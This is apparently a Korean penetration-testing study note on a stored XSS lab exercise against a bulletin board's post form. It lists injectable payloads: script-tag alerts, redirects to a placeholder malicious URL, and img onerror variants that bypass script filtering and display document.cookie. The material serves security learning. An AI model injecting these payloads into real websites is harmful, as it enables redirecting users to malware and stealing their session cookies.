실습> stored XSS
저장된 XSS (DB에 저장)
공격자가 외부에서 공격 코드를 넣을 때 DB의 TB 구조를 어느정도는 예상하고 있어야 한다.
충분한 공격코드가 저장될 수 있어야만 공격에 성공할 수 있다.
게시판의 글쓰기 부분이 공격을 할 수 있는 부분임을 알 수 있다.
글쓰기에서 아래 코드를 넣고 저장한 후 글을 볼 때 창이 뜨면
Stored XSS 공격에 취약함을 알 수 있다.
<script>alert("XSS")</script>
악성코드로 리다이렉션 시키는 코드 (큰 따옴표로 작성해야한다.)
<script>location.href='악성URL';</script>
<script>location.href="악성URL";</script>
<script>location.href='https://naver.com';</script> <-- mywebsite에서는 에러발생
<script>location.href="https://naver.com";</script>
<script> 태그를 필터링하면 <img> 태그를 이용해서 우회할 수 있다.
<img src=xss.jpg onerror=alert(document.cookie)>
<img src=xss.jpg onerror=location.href="https://daum.net">
'Linux > 모의해킹' 카테고리의 다른 글
| XSS 취약점 찾기 (0) | 2022.01.25 |
|---|---|
| reflected XSS (0) | 2022.01.21 |
| XSS 이용한 쿠키값 탈취 (0) | 2022.01.21 |
| 웹 세션 Hijacking (0) | 2022.01.21 |
| session 이해하기 (0) | 2022.01.21 |